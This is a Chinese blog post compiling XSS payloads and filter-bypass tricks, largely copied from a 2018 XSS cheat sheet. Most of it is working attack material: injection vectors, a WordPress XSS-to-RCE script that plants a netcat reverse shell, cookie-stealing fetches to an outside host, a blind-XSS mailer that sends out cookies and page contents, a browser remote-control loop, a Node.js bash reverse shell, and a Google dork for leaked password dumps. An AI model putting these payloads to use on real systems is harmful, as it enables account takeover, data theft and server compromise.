xss注入

Reflected XSS

Persistent XSS

DOM-based XSS

Mutation XSS

Universal Cross-site Scripting (UXSS)

通用跨站脚本攻击(UXSS)

<marquee>Mannix</marquee>

">"><script>with(document)alert(cookie)</script><"<"

javascript关键字过滤 +加号过滤

# document.cookie

document['coo'['CONCAT'.toLowerCase()]('kie')]

圆括号过滤

# alert(1)

alert`1`

;分号过滤

单、双、反引号过滤

eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))//

.过滤

with(location)alert(hash)

html标签过滤、属性名过滤

img

svg

body

html

embed

script

object

details

isindex

iframe

audio

video

过滤alert

top['aler'+'t'](1)

[1].find(confirm)

[1].map(confirm)

[1].some(confirm)

[1].every(confirm)

[1].filter(confirm)

[1].findIndex(confirm)

[1].map(alert)

[1].find(alert)

[1].every(alert)

[1].filter(alert)

[1].findIndex(alert)

[1].some(alert)

alert(document.domain)

YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==

atob`YWxlcnQoMSk` instanceof window</script>

右下角或者左上角弹窗

XSS Cheat Sheet

2018 Edition

Start to master the fine art of Cross-Site Scripting (XSS) right now!

LAST UPDATED ON 2018-01-29

XSS Cheat Sheet 2018 Edition is a booklet on Cross-Site Scripting (XSS), the most widespread and common flaw found in the World Wide Web. It was designed to be a quick reference material to deal with XSS related needs for bug hunters, penetration testers, security analysts, web application security students and enthusiasts.

bitcoin:34RPK3S3K8fnja4mKWhC9ms1QCMyjxA6tf?amount=0.001

https://leanpub.com/xss

https://leanpub.com/cart_purchases/vwC-6u7xSmMwkJh6Vyuefg/thankyou

https://leanpub.com/s/rIvdFQMm3wDthqgfxYGo7g.pdf

Basics

HTML Context – Simple Tag Injection

"><svg onload=alert(1)><"

HTML Context – In Block Tag Injection

</tag><svg onload=alert(1)>

"></tag><svg onload=alert(1)><"

HTML Context – Inline Injection

"onmouseover=alert(1)//

"autofocus/onfocus=alert(1)//

HTML Context – Source Injection

href, src, data

,action,formaction

data:,alert(1)

javascript:alert(1)

data:text/html,<svg onload=alert(1)>

Javascript Context – Code Injection

'-alert(1)-'

'-alert(1)//

连接符号：

+(%2b) - * / % ^ < > <= >= == === != !== ; | %0a %0A %0d %0D %0a%0d %0A%0D //

http://t.mhz.pw/game/xss/scriptstr.php?xss=%27|alert(1)|%27

http://t.mhz.pw/game/xss/scriptstr.php?xss='|alert(1)|'

var a = ''|alert(1)|'';

</script>

Javascript Context – Code Injection with Escape Bypass

\'-alert(1)//

Javascript Context – Code Injection in Logical Block

'}alert(1);{'

'}alert(1)%0A{'

\'}alert(1);{//

Javascript Context – Tag Injection

</script><svg onload=alert(1)>

Advanced

Multi Reflection – Double Reflection (Single Input)

'onload=alert(1)><svg/1='

'>alert(1)</script><script/1='

*/alert(1)</script><script>/*

Multi Reflection – Triple Reflection (Single Input)

*/alert(1)">'onload="/*<svg/1='

`-alert(1)">'onload="`<svg/1='

*/</script>'>alert(1)/*<script/1='

Multi Input Reflections (Double & Triple)

p=<svg/1='&q='onload=alert(1)>

p=<svg 1='&q='onload='/*&r=*/alert(1)'>

File Upload Injection – Filename

"><svg onload=alert(1)>.gif

File Upload Injection – Metadata

exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg

File Upload Injection – SVG File

DOM Insert Injection

DOM Insert Injection – Resource Request

data:text/html,<img src=1 onerror=alert(1)>

data:text/html,<iframe src=javascript:alert(1)>

PHP_SELF Injection

https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader

Script Injection – No Closing

Javascript postMessage() DOM Injection (with Iframe)

XML-based XSS

<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script>

<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="//brutelogic.com.br/1.js"/>

Client Side Template Injection

AngularJS Injections (v1.6 and up)

<x ng-app>{{constructor.constructor('alert(1)')()}}

CRLF Injection

%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0A%0D%0A

%3Cscript%3Ealert(1)%3C/script%3E

%0D%0ALocation:%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection

%3a0%0D%0A%0D%0A%3Cscript%3Ealert(1)%3C/script%3E

Filter Bypass

Mixed Case XSS

<Script>alert(1)</Script>

Unclosed Tags

Uppercase XSS

Extra Content for Script Tags

Double Encoded XSS

%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E

%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E

Alert without Parentheses (Strings Only)

alert`1`

Alert without Parentheses

setInterval`alert\x28document.domain\x29`

setTimeout`alert\x28document.domain\x29`

Alert without Parentheses (Tag Exclusive)

Alert without Alphabetic Chars

[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']

('\141\154\145\162\164\50\61\51')()

Alert Obfuscation

top window parent self this frames

(alert)(1)

a=alert,a(1)

[1].find(alert)

top["al"+"ert"](1)

top[/al/.source+/ert/.source](1)

al\u0065rt(1)

top['al\145rt'](1)

top[8680439..toString(30)](1)

File Upload Injection – HTML/js GIF Disguise

GIF89a=//<script>

alert(1)//</script>;

Jump to URL Fragment

eval(URL.slice(-8)) #alert(1)

eval(location.hash.slice(1)) #alert(1)

document.write(decodeURI(location.hash)) #<img/src/onerror=alert(1)>

* (Webkit only)

HTML Alternative Separators

Tag Scheme:

[1], [2], [5] => %09, %0A, %0C, %0D, %20, / and +

[3] & [4] => %09, %0A, %0C, %0D, %20, + and ' or " in both

[6] & [7] => %09, %0A, %0B, %0C, %0D, %20, /, + and ' or " in both

Strip Tags Based Bypass

"o<x>nmouseover=alert<x>(1)//

"autof<x>ocus o<x>nfocus=alert<x>(1)//

2nd Order XSS Injection

Event Origin Bypass for postMessage() XSS

http://facebook.com.localhost/crosspwn.php?

target=//brutelogic.com.br/tests/status.html&msg=<script>alert(1)</script>

CSP Bypass (for Whitelisted Google Domains)

%26jsonp=alert(1);></script>

</script><x ng-app ng-csp>{{constructor.constructor('alert(1)')()}}

Vectors without Event Handlers

<a href=javascript:alert(1)>click

<math><brute href=javascript:alert(1)>click

<form><button formaction=javascript:alert(1)>click

<math><brute xlink:href=javascript:alert(1)>click

Vectors with Agnostic Event Handlers

<x contenteditable onblur=alert(1)>lose focus!

<x onclick=alert(1)>click this!

<x oncopy=alert(1)>copy this!

<x oncontextmenu=alert(1)>right click this!

<x oncut=alert(1)>copy this!

<x ondblclick=alert(1)>double click this!

<x ondrag=alert(1)>drag this!

<x contenteditable onfocus=alert(1)>focus this!

<x contenteditable oninput=alert(1)>input here!

<x contenteditable onkeydown=alert(1)>press any key!

<x contenteditable onkeypress=alert(1)>press any key!

<x contenteditable onkeyup=alert(1)>press any key!

<x onmousedown=alert(1)>click this!

<x onmousemove=alert(1)>hover this!

<x onmouseout=alert(1)>hover this!

<x onmouseover=alert(1)>hover this!

<x onmouseup=alert(1)>click this!

<x contenteditable onpaste=alert(1)>paste here!

Javascript Alternative Comments

<!--

%0A-->

Exploitation

Remote Script Call

1. HTML-based (response must be HTML with an Access-Control-Allow-Origin

(CORS) header)

"var x=new XMLHttpRequest();x.open('GET','//brutelogic.com.br/0.php');x.send();

x.onreadystatechange=function(){if(this.readyState==4){write(x.responseText)}}"

fetch('//brutelogic.com.br/0.php').then(function(r){r.text().then(function(w)

{write(w)})})

* (with fully loaded JQuery library)

$.get('//brutelogic.com.br/0.php',function(r){write(r)})

2. Javascript-based (response must be javascript)

* (with fully loaded JQuery library)

$.getScript('//brutelogic.com.br/2.js')

Wordpress XSS to RCE (up to v4.9.1)

p = '/wordpress/wp-admin/plugin-editor.php?';

q = 'file=hello.php';

s = '<?=`nc localhost 5855 -e /bin/bash`;';

a = new XMLHttpRequest();

a.open('GET', p+q, 0);

a.send();

$ = '_wpnonce=' + /nonce" value="([^"]*?)"/.exec(a.responseText)[1] +

'&newcontent=' + s + '&action=update&' + q;

b = new XMLHttpRequest();

b.open('POST', p+q, 1);

b.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

b.send($);

b.onreadystatechange = function(){

if (this.readyState == 4) {

fetch('/wordpress/wp-content/plugins/hello.php');

}

Blind XSS Mailer

<?php header("Content-type: application/javascript"); ?>

var mailer = '<?php echo "//" . $_SERVER["SERVER_NAME"] .

$_SERVER["REQUEST_URI"] ?>';

var msg = 'USER AGENT\n' + navigator.userAgent + '\n\nTARGET URL\n' +

document.URL;

msg += '\n\nREFERRER URL\n' + document.referrer + '\n\nREADABLE

COOKIES\n' + document.cookie;

msg += '\n\nSESSION STORAGE\n' + JSON.stringify(sessionStorage) +

'\n\nLOCAL STORAGE\n' + JSON.stringify(localStorage);

msg += '\n\nFULL DOCUMENT\n' + document.documentElement.innerHTML;

var r = new XMLHttpRequest();

r.open('POST', mailer, true);

r.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');

r.send('origin=' + document.location.origin + '&msg=' +

encodeURIComponent(msg));

<?php

header("Access-Control-Allow-Origin: " . $_POST["origin"]);

$origin = $_POST["origin"];

$to = "myName@myDomain";

$subject = "XSS Blind Report for " . $origin;

$ip = "Requester: " . $_SERVER["REMOTE_ADDR"] . "\nForwarded For: ".

$_SERVER["HTTP_X_FORWARDED_FOR"];

$msg = $subject . "\n\nIP ADDRESS\n" . $ip . "\n\n" . $_POST["msg"];

$headers = "From: report@myDomain" . "\r\n";

if ($origin && $msg) {

mail($to, $subject, $msg, $headers);

}

Invisible Foreign XSS Embedding

style=display:none></iframe>

Cookie Stealing

fetch('//brutelogic.com.br/?c='+document.cookie)

Simple Virtual Defacement

Browser Remote Control

Javascript:

setInterval(function(){with(document)body.

appendChild(createElement('script')).src='//HOST:5855'},100)

Listener:

brute@logic:~$ while :; do printf "j$ "; read c; echo $c | nc -lp 5855 >/dev/null; done

Miscellaneous

XSS Online Test Page

https://brutelogic.com.br/xss.php

Multi-Case Filter-Aware HTML Injection

'"</Script><Html /Onmouseover=(alert)(1) //

Javascript Execution Delay

onload=function(){$.getScript('//brutelogic.com.br/2.js')}

onload=x=>$.getScript('//brutelogic.com.br/2.js')

Valid Source for Image Tags

<img

src=data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=

onload=alert(1)>

Shortest XSS

Mobile-only Event Handlers

Body Tag

<body onhashchange=alert(1)><a href=%23x>click this!#x

<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x

<br><x id=x>#x

<body onresize=alert(1)>press F12!

<body onhelp=alert(1)>press F1!

Less Known XSS Vectors

<select onchange=alert(1)><option>1<option>2

<menu id=x contextmenu=x onshow=alert(1)>right click me!

Cross-Origin Script (Crosspwn)

http://facebook.com.localhost/crosspwn.php?

target=//brutelogic.com.br/tests/status.html&msg=<script>alert(document.domain)

Where “facebook.com” is an allowed origin and “localhost” is attacking domain,

“//brutelogic.com.br/tests/status.html” is target page and

“<script>alert(document.domain)” is message sent.

http://localhost/crosspwn.php?target=//brutelogic.com.br/xss.php?

a=<body/onresize=alert(document.domain)>

http://localhost/crosspwn.php?target=//brutelogic.com.br/xss.php?

a=<svg/onload=eval(name)>&name=alert(document.domain)

<!DOCTYPE html>

<h2>CrossPwn</h2>

name="<?php echo $_GET['name'] ?>" height="0"

style="visibility:hidden"></iframe>

function crossPwn() {

frames[0].postMessage('<?php echo $_GET["msg"] ?>','*'); // onmessage

document.getElementsByTagName('iframe')[0].setAttribute('height', '1'); //

onresize

document.getElementsByTagName('iframe')[0].src = '<?php echo

$_GET["target"] ?>' + '#brute'; // onhashchange

}

</script>

</body>

</html>

Simple XSS Finder Script for PHP (Static Analysis)

if [ -z $1 ]

then

echo -e "Usage:\n$0 FILE\n$0 -r FOLDER"

exit

else

f=$1

sources=(GET POST REQUEST "SERVER\['PHP" "SERVER\['PATH_" "SERVER\

['REQUEST_U")

sinks=(? echo die print printf print_r var_dump)

xssam(){

for i in ${sources[@]}

a=$(grep -in "\$_${i}" $f | grep -o "\$.*=" | sed "s/[ ]\?=//g" | sort -u)

for j in ${sinks[@]}

grep --color -in "${j}.*\$_${i}" $f

for k in $a

grep --color -in "${j}.*$k" $f

done

}

if [ $f != "-r" ]

then

xssam

else

for i in $(find $2 -type f -name "*.php")

echo "File: $i"

f=$i

xssam

done

Node.js RCE

Javascript:

require('child_process').exec('bash -c "bash -i >& /dev/tcp/HOST/5855 0>&1"')

nc -lp 5855

ASCII Encoding Table

Remember to replace “&” and “#” in URLs

with their encoded version (%26 and %23 respectively).

http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E

'"()%26%25<acx><ScRiPt >prompt(931289)</ScRiPt>

http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E

'"()%26%25<acx><ScRiPt >prompt(973761)</ScRiPt>

<x oncopy=alert('XSS')>copy this

<haha onclick=alert('XSS')>click here

alert() prompt() confirm()

alert`` prompt`` confirm``

(alert)`` (prompt)`` (confirm)``

[8].some(alert) (((prompt)))`` co\u006efirm

https://xsshunter.com/features

https://github.com/ssl/ezXSS

https://github.com/LewisArdern/bXSS

https://knoxss.me/?page_id=2

eval(new class extends String{}('alert')+new class extends String{}('(1)'))

eval(new class extends String{}('alert')+new class extends String{}('(1)'))

</script>

filetype:sql intext:password | pass | passwd intext:username intext:INSERT INTO `users` VALUES

更新一句([,_____,,,,___]=(__=[])+{_:__},[______,_,________,____,,_________,_______,__,,,__________]=[!!_____]+!_____+_____._____)[___+=_____+__________+__+______+_+________+___+______+_____+_][___](_________+_______+____+_+______+'(-~_)')()

posted @ 2022-11-04 19:59 jerry-autumn 阅读(331) 评论(0) 收藏举报

刷新页面返回顶部

xss注入

公告